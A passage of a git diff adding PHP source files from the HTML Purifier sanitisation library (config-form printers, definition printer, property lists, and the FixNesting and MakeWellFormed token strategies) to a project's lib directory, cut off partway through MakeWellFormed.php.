decorate + */ + public function __construct($obj) { + parent::__construct(); + $this->obj = $obj; + } + public function render($ns, $directive, $value, $name, $config) { + if (is_array($config) && isset($config[0])) { + $gen_config = $config[0]; + $config = $config[1]; + } else { + $gen_config = $config; + } + $this->prepareGenerator($gen_config); + + $ret = ''; + $ret .= $this->start('label', array('for' => "$name:Null_$ns.$directive")); + $ret .= $this->element('span', "$ns.$directive:", array('class' => 'verbose')); + $ret .= $this->text(' Null/Disabled'); + $ret .= $this->end('label'); + $attr = array( + 'type' => 'checkbox', + 'value' => '1', + 'class' => 'null-toggle', + 'name' => "$name"."[Null_$ns.$directive]", + 'id' => "$name:Null_$ns.$directive", + 'onclick' => "toggleWriteability('$name:$ns.$directive',checked)" // INLINE JAVASCRIPT!!!! + ); + if ($this->obj instanceof HTMLPurifier_Printer_ConfigForm_bool) { + // modify inline javascript slightly + $attr['onclick'] = "toggleWriteability('$name:Yes_$ns.$directive',checked);toggleWriteability('$name:No_$ns.$directive',checked)"; + } + if ($value === null) $attr['checked'] = 'checked'; + $ret .= $this->elementEmpty('input', $attr); + $ret .= $this->text(' or '); + $ret .= $this->elementEmpty('br'); + $ret .= $this->obj->render($ns, $directive, $value, $name, array($gen_config, $config)); + return $ret; + } +} + +/** + * Swiss-army knife configuration form field printer + */ +class HTMLPurifier_Printer_ConfigForm_default extends HTMLPurifier_Printer { + public $cols = 18; + public $rows = 5; + public function render($ns, $directive, $value, $name, $config) { + if (is_array($config) && isset($config[0])) { + $gen_config = $config[0]; + $config = $config[1]; + } else { + $gen_config = $config; + } + $this->prepareGenerator($gen_config); + // this should probably be split up a little + $ret = ''; + $def = $config->def->info["$ns.$directive"]; + if (is_int($def)) { + $type = abs($def); + } else { + $type = $def->type; + } + if (is_array($value)) { + switch ($type) { + case HTMLPurifier_VarParser::LOOKUP: + $array = $value; + $value = array(); + foreach ($array as $val => $b) { + $value[] = $val; + } + case HTMLPurifier_VarParser::ALIST: + $value = implode(PHP_EOL, $value); + break; + case HTMLPurifier_VarParser::HASH: + $nvalue = ''; + foreach ($value as $i => $v) { + $nvalue .= "$i:$v" . PHP_EOL; + } + $value = $nvalue; + break; + default: + $value = ''; + } + } + if ($type === HTMLPurifier_VarParser::MIXED) { + return 'Not supported'; + $value = serialize($value); + } + $attr = array( + 'name' => "$name"."[$ns.$directive]", + 'id' => "$name:$ns.$directive" + ); + if ($value === null) $attr['disabled'] = 'disabled'; + if (isset($def->allowed)) { + $ret .= $this->start('select', $attr); + foreach ($def->allowed as $val => $b) { + $attr = array(); + if ($value == $val) $attr['selected'] = 'selected'; + $ret .= $this->element('option', $val, $attr); + } + $ret .= $this->end('select'); + } elseif ( + $type === HTMLPurifier_VarParser::TEXT || + $type === HTMLPurifier_VarParser::ITEXT || + $type === HTMLPurifier_VarParser::ALIST || + $type === HTMLPurifier_VarParser::HASH || + $type === HTMLPurifier_VarParser::LOOKUP + ) { + $attr['cols'] = $this->cols; + $attr['rows'] = $this->rows; + $ret .= $this->start('textarea', $attr); + $ret .= $this->text($value); + $ret .= $this->end('textarea'); + } else { + $attr['value'] = $value; + $attr['type'] = 'text'; + $ret .= $this->elementEmpty('input', $attr); + } + return $ret; + } +} + +/** + * Bool form field printer + */ +class HTMLPurifier_Printer_ConfigForm_bool extends HTMLPurifier_Printer { + public function render($ns, $directive, $value, $name, $config) { + if (is_array($config) && isset($config[0])) { + $gen_config = $config[0]; + $config = $config[1]; + } else { + $gen_config = $config; + } + $this->prepareGenerator($gen_config); + $ret = ''; + $ret .= $this->start('div', array('id' => "$name:$ns.$directive")); + + $ret .= $this->start('label', array('for' => "$name:Yes_$ns.$directive")); + $ret .= $this->element('span', "$ns.$directive:", array('class' => 'verbose')); + $ret .= $this->text(' Yes'); + $ret .= $this->end('label'); + + $attr = array( + 'type' => 'radio', + 'name' => "$name"."[$ns.$directive]", + 'id' => "$name:Yes_$ns.$directive", + 'value' => '1' + ); + if ($value === true) $attr['checked'] = 'checked'; + if ($value === null) $attr['disabled'] = 'disabled'; + $ret .= $this->elementEmpty('input', $attr); + + $ret .= $this->start('label', array('for' => "$name:No_$ns.$directive")); + $ret .= $this->element('span', "$ns.$directive:", array('class' => 'verbose')); + $ret .= $this->text(' No'); + $ret .= $this->end('label'); + + $attr = array( + 'type' => 'radio', + 'name' => "$name"."[$ns.$directive]", + 'id' => "$name:No_$ns.$directive", + 'value' => '0' + ); + if ($value === false) $attr['checked'] = 'checked'; + if ($value === null) $attr['disabled'] = 'disabled'; + $ret .= $this->elementEmpty('input', $attr); + + $ret .= $this->end('div'); + + return $ret; + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Printer/HTMLDefinition.php b/lib/htmlpurifier/library/HTMLPurifier/Printer/HTMLDefinition.php new file mode 100644 index 000000000..8a8f126b8 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Printer/HTMLDefinition.php @@ -0,0 +1,272 @@ +<?php + +class HTMLPurifier_Printer_HTMLDefinition extends HTMLPurifier_Printer +{ + + /** + * Instance of HTMLPurifier_HTMLDefinition, for easy access + */ + protected $def; + + public function render($config) { + $ret = ''; + $this->config =& $config; + + $this->def = $config->getHTMLDefinition(); + + $ret .= $this->start('div', array('class' => 'HTMLPurifier_Printer')); + + $ret .= $this->renderDoctype(); + $ret .= $this->renderEnvironment(); + $ret .= $this->renderContentSets(); + $ret .= $this->renderInfo(); + + $ret .= $this->end('div'); + + return $ret; + } + + /** + * Renders the Doctype table + */ + protected function renderDoctype() { + $doctype = $this->def->doctype; + $ret = ''; + $ret .= $this->start('table'); + $ret .= $this->element('caption', 'Doctype'); + $ret .= $this->row('Name', $doctype->name); + $ret .= $this->row('XML', $doctype->xml ? 'Yes' : 'No'); + $ret .= $this->row('Default Modules', implode($doctype->modules, ', ')); + $ret .= $this->row('Default Tidy Modules', implode($doctype->tidyModules, ', ')); + $ret .= $this->end('table'); + return $ret; + } + + + /** + * Renders environment table, which is miscellaneous info + */ + protected function renderEnvironment() { + $def = $this->def; + + $ret = ''; + + $ret .= $this->start('table'); + $ret .= $this->element('caption', 'Environment'); + + $ret .= $this->row('Parent of fragment', $def->info_parent); + $ret .= $this->renderChildren($def->info_parent_def->child); + $ret .= $this->row('Block wrap name', $def->info_block_wrapper); + + $ret .= $this->start('tr'); + $ret .= $this->element('th', 'Global attributes'); + $ret .= $this->element('td', $this->listifyAttr($def->info_global_attr),0,0); + $ret .= $this->end('tr'); + + $ret .= $this->start('tr'); + $ret .= $this->element('th', 'Tag transforms'); + $list = array(); + foreach ($def->info_tag_transform as $old => $new) { + $new = $this->getClass($new, 'TagTransform_'); + $list[] = "<$old> with $new"; + } + $ret .= $this->element('td', $this->listify($list)); + $ret .= $this->end('tr'); + + $ret .= $this->start('tr'); + $ret .= $this->element('th', 'Pre-AttrTransform'); + $ret .= $this->element('td', $this->listifyObjectList($def->info_attr_transform_pre)); + $ret .= $this->end('tr'); + + $ret .= $this->start('tr'); + $ret .= $this->element('th', 'Post-AttrTransform'); + $ret .= $this->element('td', $this->listifyObjectList($def->info_attr_transform_post)); + $ret .= $this->end('tr'); + + $ret .= $this->end('table'); + return $ret; + } + + /** + * Renders the Content Sets table + */ + protected function renderContentSets() { + $ret = ''; + $ret .= $this->start('table'); + $ret .= $this->element('caption', 'Content Sets'); + foreach ($this->def->info_content_sets as $name => $lookup) { + $ret .= $this->heavyHeader($name); + $ret .= $this->start('tr'); + $ret .= $this->element('td', $this->listifyTagLookup($lookup)); + $ret .= $this->end('tr'); + } + $ret .= $this->end('table'); + return $ret; + } + + /** + * Renders the Elements ($info) table + */ + protected function renderInfo() { + $ret = ''; + $ret .= $this->start('table'); + $ret .= $this->element('caption', 'Elements ($info)'); + ksort($this->def->info); + $ret .= $this->heavyHeader('Allowed tags', 2); + $ret .= $this->start('tr'); + $ret .= $this->element('td', $this->listifyTagLookup($this->def->info), array('colspan' => 2)); + $ret .= $this->end('tr'); + foreach ($this->def->info as $name => $def) { + $ret .= $this->start('tr'); + $ret .= $this->element('th', "<$name>", array('class'=>'heavy', 'colspan' => 2)); + $ret .= $this->end('tr'); + $ret .= $this->start('tr'); + $ret .= $this->element('th', 'Inline content'); + $ret .= $this->element('td', $def->descendants_are_inline ? 'Yes' : 'No'); + $ret .= $this->end('tr'); + if (!empty($def->excludes)) { + $ret .= $this->start('tr'); + $ret .= $this->element('th', 'Excludes'); + $ret .= $this->element('td', $this->listifyTagLookup($def->excludes)); + $ret .= $this->end('tr'); + } + if (!empty($def->attr_transform_pre)) { + $ret .= $this->start('tr'); + $ret .= $this->element('th', 'Pre-AttrTransform'); + $ret .= $this->element('td', $this->listifyObjectList($def->attr_transform_pre)); + $ret .= $this->end('tr'); + } + if (!empty($def->attr_transform_post)) { + $ret .= $this->start('tr'); + $ret .= $this->element('th', 'Post-AttrTransform'); + $ret .= $this->element('td', $this->listifyObjectList($def->attr_transform_post)); + $ret .= $this->end('tr'); + } + if (!empty($def->auto_close)) { + $ret .= $this->start('tr'); + $ret .= $this->element('th', 'Auto closed by'); + $ret .= $this->element('td', $this->listifyTagLookup($def->auto_close)); + $ret .= $this->end('tr'); + } + $ret .= $this->start('tr'); + $ret .= $this->element('th', 'Allowed attributes'); + $ret .= $this->element('td',$this->listifyAttr($def->attr), array(), 0); + $ret .= $this->end('tr'); + + if (!empty($def->required_attr)) { + $ret .= $this->row('Required attributes', $this->listify($def->required_attr)); + } + + $ret .= $this->renderChildren($def->child); + } + $ret .= $this->end('table'); + return $ret; + } + + /** + * Renders a row describing the allowed children of an element + * @param $def HTMLPurifier_ChildDef of pertinent element + */ + protected function renderChildren($def) { + $context = new HTMLPurifier_Context(); + $ret = ''; + $ret .= $this->start('tr'); + $elements = array(); + $attr = array(); + if (isset($def->elements)) { + if ($def->type == 'strictblockquote') { + $def->validateChildren(array(), $this->config, $context); + } + $elements = $def->elements; + } + if ($def->type == 'chameleon') { + $attr['rowspan'] = 2; + } elseif ($def->type == 'empty') { + $elements = array(); + } elseif ($def->type == 'table') { + $elements = array_flip(array('col', 'caption', 'colgroup', 'thead', + 'tfoot', 'tbody', 'tr')); + } + $ret .= $this->element('th', 'Allowed children', $attr); + + if ($def->type == 'chameleon') { + + $ret .= $this->element('td', + '<em>Block</em>: ' . + $this->escape($this->listifyTagLookup($def->block->elements)),0,0); + $ret .= $this->end('tr'); + $ret .= $this->start('tr'); + $ret .= $this->element('td', + '<em>Inline</em>: ' . + $this->escape($this->listifyTagLookup($def->inline->elements)),0,0); + + } elseif ($def->type == 'custom') { + + $ret .= $this->element('td', '<em>'.ucfirst($def->type).'</em>: ' . + $def->dtd_regex); + + } else { + $ret .= $this->element('td', + '<em>'.ucfirst($def->type).'</em>: ' . + $this->escape($this->listifyTagLookup($elements)),0,0); + } + $ret .= $this->end('tr'); + return $ret; + } + + /** + * Listifies a tag lookup table. + * @param $array Tag lookup array in form of array('tagname' => true) + */ + protected function listifyTagLookup($array) { + ksort($array); + $list = array(); + foreach ($array as $name => $discard) { + if ($name !== '#PCDATA' && !isset($this->def->info[$name])) continue; + $list[] = $name; + } + return $this->listify($list); + } + + /** + * Listifies a list of objects by retrieving class names and internal state + * @param $array List of objects + * @todo Also add information about internal state + */ + protected function listifyObjectList($array) { + ksort($array); + $list = array(); + foreach ($array as $discard => $obj) { + $list[] = $this->getClass($obj, 'AttrTransform_'); + } + return $this->listify($list); + } + + /** + * Listifies a hash of attributes to AttrDef classes + * @param $array Array hash in form of array('attrname' => HTMLPurifier_AttrDef) + */ + protected function listifyAttr($array) { + ksort($array); + $list = array(); + foreach ($array as $name => $obj) { + if ($obj === false) continue; + $list[] = "$name = <i>" . $this->getClass($obj, 'AttrDef_') . '</i>'; + } + return $this->listify($list); + } + + /** + * Creates a heavy header row + */ + protected function heavyHeader($text, $num = 1) { + $ret = ''; + $ret .= $this->start('tr'); + $ret .= $this->element('th', $text, array('colspan' => $num, 'class' => 'heavy')); + $ret .= $this->end('tr'); + return $ret; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/PropertyList.php b/lib/htmlpurifier/library/HTMLPurifier/PropertyList.php new file mode 100644 index 000000000..2b99fb7bc --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/PropertyList.php @@ -0,0 +1,86 @@ +<?php + +/** + * Generic property list implementation + */ +class HTMLPurifier_PropertyList +{ + /** + * Internal data-structure for properties + */ + protected $data = array(); + + /** + * Parent plist + */ + protected $parent; + + protected $cache; + + public function __construct($parent = null) { + $this->parent = $parent; + } + + /** + * Recursively retrieves the value for a key + */ + public function get($name) { + if ($this->has($name)) return $this->data[$name]; + // possible performance bottleneck, convert to iterative if necessary + if ($this->parent) return $this->parent->get($name); + throw new HTMLPurifier_Exception("Key '$name' not found"); + } + + /** + * Sets the value of a key, for this plist + */ + public function set($name, $value) { + $this->data[$name] = $value; + } + + /** + * Returns true if a given key exists + */ + public function has($name) { + return array_key_exists($name, $this->data); + } + + /** + * Resets a value to the value of it's parent, usually the default. If + * no value is specified, the entire plist is reset. + */ + public function reset($name = null) { + if ($name == null) $this->data = array(); + else unset($this->data[$name]); + } + + /** + * Squashes this property list and all of its property lists into a single + * array, and returns the array. This value is cached by default. + * @param $force If true, ignores the cache and regenerates the array. + */ + public function squash($force = false) { + if ($this->cache !== null && !$force) return $this->cache; + if ($this->parent) { + return $this->cache = array_merge($this->parent->squash($force), $this->data); + } else { + return $this->cache = $this->data; + } + } + + /** + * Returns the parent plist. + */ + public function getParent() { + return $this->parent; + } + + /** + * Sets the parent plist. + */ + public function setParent($plist) { + $this->parent = $plist; + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/PropertyListIterator.php b/lib/htmlpurifier/library/HTMLPurifier/PropertyListIterator.php new file mode 100644 index 000000000..8f250443e --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/PropertyListIterator.php @@ -0,0 +1,32 @@ +<?php + +/** + * Property list iterator. Do not instantiate this class directly. + */ +class HTMLPurifier_PropertyListIterator extends FilterIterator +{ + + protected $l; + protected $filter; + + /** + * @param $data Array of data to iterate over + * @param $filter Optional prefix to only allow values of + */ + public function __construct(Iterator $iterator, $filter = null) { + parent::__construct($iterator); + $this->l = strlen($filter); + $this->filter = $filter; + } + + public function accept() { + $key = $this->getInnerIterator()->key(); + if( strncmp($key, $this->filter, $this->l) !== 0 ) { + return false; + } + return true; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Strategy.php b/lib/htmlpurifier/library/HTMLPurifier/Strategy.php new file mode 100644 index 000000000..246286521 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Strategy.php @@ -0,0 +1,26 @@ +<?php + +/** + * Supertype for classes that define a strategy for modifying/purifying tokens. + * + * While HTMLPurifier's core purpose is fixing HTML into something proper, + * strategies provide plug points for extra configuration or even extra + * features, such as custom tags, custom parsing of text, etc. + */ + + +abstract class HTMLPurifier_Strategy +{ + + /** + * Executes the strategy on the tokens. + * + * @param $tokens Array of HTMLPurifier_Token objects to be operated on. + * @param $config Configuration options + * @returns Processed array of token objects. + */ + abstract public function execute($tokens, $config, $context); + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Strategy/Composite.php b/lib/htmlpurifier/library/HTMLPurifier/Strategy/Composite.php new file mode 100644 index 000000000..92aefd33e --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Strategy/Composite.php @@ -0,0 +1,23 @@ +<?php + +/** + * Composite strategy that runs multiple strategies on tokens. + */ +abstract class HTMLPurifier_Strategy_Composite extends HTMLPurifier_Strategy +{ + + /** + * List of strategies to run tokens through. + */ + protected $strategies = array(); + + public function execute($tokens, $config, $context) { + foreach ($this->strategies as $strategy) { + $tokens = $strategy->execute($tokens, $config, $context); + } + return $tokens; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Strategy/Core.php b/lib/htmlpurifier/library/HTMLPurifier/Strategy/Core.php new file mode 100644 index 000000000..d90e15860 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Strategy/Core.php @@ -0,0 +1,18 @@ +<?php + +/** + * Core strategy composed of the big four strategies. + */ +class HTMLPurifier_Strategy_Core extends HTMLPurifier_Strategy_Composite +{ + + public function __construct() { + $this->strategies[] = new HTMLPurifier_Strategy_RemoveForeignElements(); + $this->strategies[] = new HTMLPurifier_Strategy_MakeWellFormed(); + $this->strategies[] = new HTMLPurifier_Strategy_FixNesting(); + $this->strategies[] = new HTMLPurifier_Strategy_ValidateAttributes(); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Strategy/FixNesting.php b/lib/htmlpurifier/library/HTMLPurifier/Strategy/FixNesting.php new file mode 100644 index 000000000..f81802391 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Strategy/FixNesting.php @@ -0,0 +1,328 @@ +<?php + +/** + * Takes a well formed list of tokens and fixes their nesting. + * + * HTML elements dictate which elements are allowed to be their children, + * for example, you can't have a p tag in a span tag. Other elements have + * much more rigorous definitions: tables, for instance, require a specific + * order for their elements. There are also constraints not expressible by + * document type definitions, such as the chameleon nature of ins/del + * tags and global child exclusions. + * + * The first major objective of this strategy is to iterate through all the + * nodes (not tokens) of the list of tokens and determine whether or not + * their children conform to the element's definition. If they do not, the + * child definition may optionally supply an amended list of elements that + * is valid or require that the entire node be deleted (and the previous + * node rescanned). + * + * The second objective is to ensure that explicitly excluded elements of + * an element do not appear in its children. Code that accomplishes this + * task is pervasive through the strategy, though the two are distinct tasks + * and could, theoretically, be seperated (although it's not recommended). + * + * @note Whether or not unrecognized children are silently dropped or + * translated into text depends on the child definitions. + * + * @todo Enable nodes to be bubbled out of the structure. + */ + +class HTMLPurifier_Strategy_FixNesting extends HTMLPurifier_Strategy +{ + + public function execute($tokens, $config, $context) { + //####################################################################// + // Pre-processing + + // get a copy of the HTML definition + $definition = $config->getHTMLDefinition(); + + // insert implicit "parent" node, will be removed at end. + // DEFINITION CALL + $parent_name = $definition->info_parent; + array_unshift($tokens, new HTMLPurifier_Token_Start($parent_name)); + $tokens[] = new HTMLPurifier_Token_End($parent_name); + + // setup the context variable 'IsInline', for chameleon processing + // is 'false' when we are not inline, 'true' when it must always + // be inline, and an integer when it is inline for a certain + // branch of the document tree + $is_inline = $definition->info_parent_def->descendants_are_inline; + $context->register('IsInline', $is_inline); + + // setup error collector + $e =& $context->get('ErrorCollector', true); + + //####################################################################// + // Loop initialization + + // stack that contains the indexes of all parents, + // $stack[count($stack)-1] being the current parent + $stack = array(); + + // stack that contains all elements that are excluded + // it is organized by parent elements, similar to $stack, + // but it is only populated when an element with exclusions is + // processed, i.e. there won't be empty exclusions. + $exclude_stack = array(); + + // variable that contains the start token while we are processing + // nodes. This enables error reporting to do its job + $start_token = false; + $context->register('CurrentToken', $start_token); + + //####################################################################// + // Loop + + // iterate through all start nodes. Determining the start node + // is complicated so it has been omitted from the loop construct + for ($i = 0, $size = count($tokens) ; $i < $size; ) { + + //################################################################// + // Gather information on children + + // child token accumulator + $child_tokens = array(); + + // scroll to the end of this node, report number, and collect + // all children + for ($j = $i, $depth = 0; ; $j++) { + if ($tokens[$j] instanceof HTMLPurifier_Token_Start) { + $depth++; + // skip token assignment on first iteration, this is the + // token we currently are on + if ($depth == 1) continue; + } elseif ($tokens[$j] instanceof HTMLPurifier_Token_End) { + $depth--; + // skip token assignment on last iteration, this is the + // end token of the token we're currently on + if ($depth == 0) break; + } + $child_tokens[] = $tokens[$j]; + } + + // $i is index of start token + // $j is index of end token + + $start_token = $tokens[$i]; // to make token available via CurrentToken + + //################################################################// + // Gather information on parent + + // calculate parent information + if ($count = count($stack)) { + $parent_index = $stack[$count-1]; + $parent_name = $tokens[$parent_index]->name; + if ($parent_index == 0) { + $parent_def = $definition->info_parent_def; + } else { + $parent_def = $definition->info[$parent_name]; + } + } else { + // processing as if the parent were the "root" node + // unknown info, it won't be used anyway, in the future, + // we may want to enforce one element only (this is + // necessary for HTML Purifier to clean entire documents + $parent_index = $parent_name = $parent_def = null; + } + + // calculate context + if ($is_inline === false) { + // check if conditions make it inline + if (!empty($parent_def) && $parent_def->descendants_are_inline) { + $is_inline = $count - 1; + } + } else { + // check if we're out of inline + if ($count === $is_inline) { + $is_inline = false; + } + } + + //################################################################// + // Determine whether element is explicitly excluded SGML-style + + // determine whether or not element is excluded by checking all + // parent exclusions. The array should not be very large, two + // elements at most. + $excluded = false; + if (!empty($exclude_stack)) { + foreach ($exclude_stack as $lookup) { + if (isset($lookup[$tokens[$i]->name])) { + $excluded = true; + // no need to continue processing + break; + } + } + } + + //################################################################// + // Perform child validation + + if ($excluded) { + // there is an exclusion, remove the entire node + $result = false; + $excludes = array(); // not used, but good to initialize anyway + } else { + // DEFINITION CALL + if ($i === 0) { + // special processing for the first node + $def = $definition->info_parent_def; + } else { + $def = $definition->info[$tokens[$i]->name]; + + } + + if (!empty($def->child)) { + // have DTD child def validate children + $result = $def->child->validateChildren( + $child_tokens, $config, $context); + } else { + // weird, no child definition, get rid of everything + $result = false; + } + + // determine whether or not this element has any exclusions + $excludes = $def->excludes; + } + + // $result is now a bool or array + + //################################################################// + // Process result by interpreting $result + + if ($result === true || $child_tokens === $result) { + // leave the node as is + + // register start token as a parental node start + $stack[] = $i; + + // register exclusions if there are any + if (!empty($excludes)) $exclude_stack[] = $excludes; + + // move cursor to next possible start node + $i++; + + } elseif($result === false) { + // remove entire node + + if ($e) { + if ($excluded) { + $e->send(E_ERROR, 'Strategy_FixNesting: Node excluded'); + } else { + $e->send(E_ERROR, 'Strategy_FixNesting: Node removed'); + } + } + + // calculate length of inner tokens and current tokens + $length = $j - $i + 1; + + // perform removal + array_splice($tokens, $i, $length); + + // update size + $size -= $length; + + // there is no start token to register, + // current node is now the next possible start node + // unless it turns out that we need to do a double-check + + // this is a rought heuristic that covers 100% of HTML's + // cases and 99% of all other cases. A child definition + // that would be tricked by this would be something like: + // ( | a b c) where it's all or nothing. Fortunately, + // our current implementation claims that that case would + // not allow empty, even if it did + if (!$parent_def->child->allow_empty) { + // we need to do a double-check + $i = $parent_index; + array_pop($stack); + } + + // PROJECTED OPTIMIZATION: Process all children elements before + // reprocessing parent node. + + } else { + // replace node with $result + + // calculate length of inner tokens + $length = $j - $i - 1; + + if ($e) { + if (empty($result) && $length) { + $e->send(E_ERROR, 'Strategy_FixNesting: Node contents removed'); + } else { + $e->send(E_WARNING, 'Strategy_FixNesting: Node reorganized'); + } + } + + // perform replacement + array_splice($tokens, $i + 1, $length, $result); + + // update size + $size -= $length; + $size += count($result); + + // register start token as a parental node start + $stack[] = $i; + + // register exclusions if there are any + if (!empty($excludes)) $exclude_stack[] = $excludes; + + // move cursor to next possible start node + $i++; + + } + + //################################################################// + // Scroll to next start node + + // We assume, at this point, that $i is the index of the token + // that is the first possible new start point for a node. + + // Test if the token indeed is a start tag, if not, move forward + // and test again. + $size = count($tokens); + while ($i < $size and !$tokens[$i] instanceof HTMLPurifier_Token_Start) { + if ($tokens[$i] instanceof HTMLPurifier_Token_End) { + // pop a token index off the stack if we ended a node + array_pop($stack); + // pop an exclusion lookup off exclusion stack if + // we ended node and that node had exclusions + if ($i == 0 || $i == $size - 1) { + // use specialized var if it's the super-parent + $s_excludes = $definition->info_parent_def->excludes; + } else { + $s_excludes = $definition->info[$tokens[$i]->name]->excludes; + } + if ($s_excludes) { + array_pop($exclude_stack); + } + } + $i++; + } + + } + + //####################################################################// + // Post-processing + + // remove implicit parent tokens at the beginning and end + array_shift($tokens); + array_pop($tokens); + + // remove context variables + $context->destroy('IsInline'); + $context->destroy('CurrentToken'); + + //####################################################################// + // Return + + return $tokens; + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Strategy/MakeWellFormed.php b/lib/htmlpurifier/library/HTMLPurifier/Strategy/MakeWellFormed.php new file mode 100644 index 000000000..c7aa1bb86 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Strategy/MakeWellFormed.php @@ -0,0 +1,532 @@ +<?php + +/** + * Takes tokens makes them well-formed (balance end tags, etc.) + * + * Specification of the armor attributes this strategy uses: + * + * - MakeWellFormed_TagClosedError: This armor field is used to + * suppress tag closed errors for certain tokens [TagClosedSuppress], + * in particular, if a tag was generated automatically by HTML + * Purifier, we may rely on our infrastructure to close it for us + * and shouldn't report an error to the user [TagClosedAuto]. + */ +class HTMLPurifier_Strategy_MakeWellFormed extends HTMLPurifier_Strategy +{ + + /** + * Array stream of tokens being processed. + */ + protected $tokens; + + /** + * Current index in $tokens. + */ + protected $t; + + /** + * Current nesting of elements. + */ + protected $stack; + + /** + * Injectors active in this stream processing. + */ + protected $injectors; + + /** + * Current instance of HTMLPurifier_Config. + */ + protected $config; + + /** + * Current instance of HTMLPurifier_Context. + */ + protected $context; + + public function execute($tokens, $config, $context) { + + $definition = $config->getHTMLDefinition(); + + // local variables + $generator = new HTMLPurifier_Generator($config, $context); + $escape_invalid_tags = $config->get('Core.EscapeInvalidTags'); + // used for autoclose early abortion + $global_parent_allowed_elements = array(); + if (isset($definition->info[$definition->info_parent])) { + // may be unset under testing circumstances + $global_parent_allowed_elements = $definition->info[$definition->info_parent]->child->getAllowedElements($config); + } + $e = $context->get('ErrorCollector', true); + $t = false; // token index + $i = false; // injector index + $token = false; // the current token + $reprocess = false; // whether or not to reprocess the same token + $stack = array(); + + // member variables + $this->stack =& $stack; + $this->t =& $t; + $this->tokens =& $tokens; + $this->config = $config; + $this->context = $context; + + // context variables + $context->register('CurrentNesting', $stack); + $context->register('InputIndex', $t); + $context->register('InputTokens', $tokens); + $context->register('CurrentToken', $token); + + // -- begin INJECTOR -- + + $this->injectors = array(); + + $injectors = $config->getBatch('AutoFormat'); + $def_injectors = $definition->info_injector; + $custom_injectors = $injectors['Custom']; + unset($injectors['Custom']); // special case + foreach ($injectors as $injector => $b) { + // XXX: Fix with a legitimate lookup table of enabled filters + if (strpos($injector, '.') !== false) continue; + $injector = "HTMLPurifier_Injector_$injector"; + if (!$b) continue; + $this->injectors[] = new $injector; + } + foreach ($def_injectors as $injector) { + // assumed to be objects + $this->injectors[] = $injector; + } + foreach ($custom_injectors as $injector) { + if (!$injector) continue; + if (is_string($injector)) { + $injector = "HTMLPurifier_Injector_$injector"; + $injector = new $injector; + } + $this->injectors[] = $injector; + } + + // give the injectors references to the definition and context + // variables for performance reasons + foreach ($this->injectors as $ix => $injector) { + $error = $injector->prepare($config, $context); + if (!$error) continue; + array_splice($this->injectors, $ix, 1); // rm the injector + trigger_error("Cannot enable {$injector->name} injector because $error is not allowed", E_USER_WARNING); + } + + // -- end INJECTOR -- + + // a note on reprocessing: + // In order to reduce code duplication, whenever some code needs + // to make HTML changes in order to make things "correct", the + // new HTML gets sent through the purifier, regardless of its + // status. This means that if we add a start token, because it + // was totally necessary, we don't have to update nesting; we just + // punt ($reprocess = true; continue;) and it does that for us. + + // isset is in loop because $tokens size changes during loop exec + for ( + $t = 0; + $t == 0 || isset($tokens[$t - 1]); + // only increment if we don't need to reprocess + $reprocess ? $reprocess = false : $t++ + ) { + + // check for a rewind + if (is_int($i) && $i >= 0) { + // possibility: disable rewinding if the current token has a + // rewind set on it already. This would offer protection from + // infinite loop, but might hinder some advanced rewinding. + $rewind_to = $this->injectors[$i]->getRewind(); + if (is_int($rewind_to) && $rewind_to < $t) { + if ($rewind_to < 0) $rewind_to = 0; + while ($t > $rewind_to) { + $t--; + $prev = $tokens[$t]; + // indicate that other injectors should not process this token, + // but we need to reprocess it + unset($prev->skip[$i]); + $prev->rewind = $i; + if ($prev instanceof HTMLPurifier_Token_Start) array_pop($this->stack); + elseif ($prev instanceof HTMLPurifier_Token_End) $this->stack[] = $prev->start; + } + } + $i = false; + } + + // handle case of document end + if (!isset($tokens[$t])) { + // kill processing if stack is empty + if (empty($this->stack)) break; + + // peek + $top_nesting = array_pop($this->stack); + $this->stack[] = $top_nesting; + + // send error [TagClosedSuppress] + if ($e && !isset($top_nesting->armor['MakeWellFormed_TagClosedError'])) { + $e->send(E_NOTICE, 'Strategy_MakeWellFormed: Tag closed by document end', $top_nesting); + } + + // append, don't splice, since this is the end + $tokens[] = new HTMLPurifier_Token_End($top_nesting->name); + + // punt! + $reprocess = true; + continue; + } + + $token = $tokens[$t]; + + //echo '<br>'; printTokens($tokens, $t); printTokens($this->stack); + //flush(); + + // quick-check: if it's not a tag, no need to process + if (empty($token->is_tag)) { + if ($token instanceof HTMLPurifier_Token_Text) { + foreach ($this->injectors as $i => $injector) { + if (isset($token->skip[$i])) continue; + if ($token->rewind !== null && $token->rewind !== $i) continue; + $injector->handleText($token); + $this->processToken($token, $i); + $reprocess = true; + break; + } + } + // another possibility is a comment + continue; + } + + if (isset($definition->info[$token->name])) { + $type = $definition->info[$token->name]->child->type; + } else { + $type = false; // Type is unknown, treat accordingly + } + + // quick tag checks: anything that's *not* an end tag + $ok = false; + if ($type === 'empty' && $token instanceof HTMLPurifier_Token_Start) { + // claims to be a start tag but is empty + $token = new HTMLPurifier_Token_Empty($token->name, $token->attr, $token->line, $token->col, $token->armor); + $ok = true; + } elseif ($type && $type !== 'empty' && $token instanceof HTMLPurifier_Token_Empty) { + // claims to be empty but really is a start tag + $this->swap(new HTMLPurifier_Token_End($token->name)); + $this->insertBefore(new HTMLPurifier_Token_Start($token->name, $token->attr, $token->line, $token->col, $token->armor)); + // punt (since we had to modify the input stream in a non-trivial way) + $reprocess = true; + continue; + } elseif ($token instanceof HTMLPurifier_Token_Empty) { + // 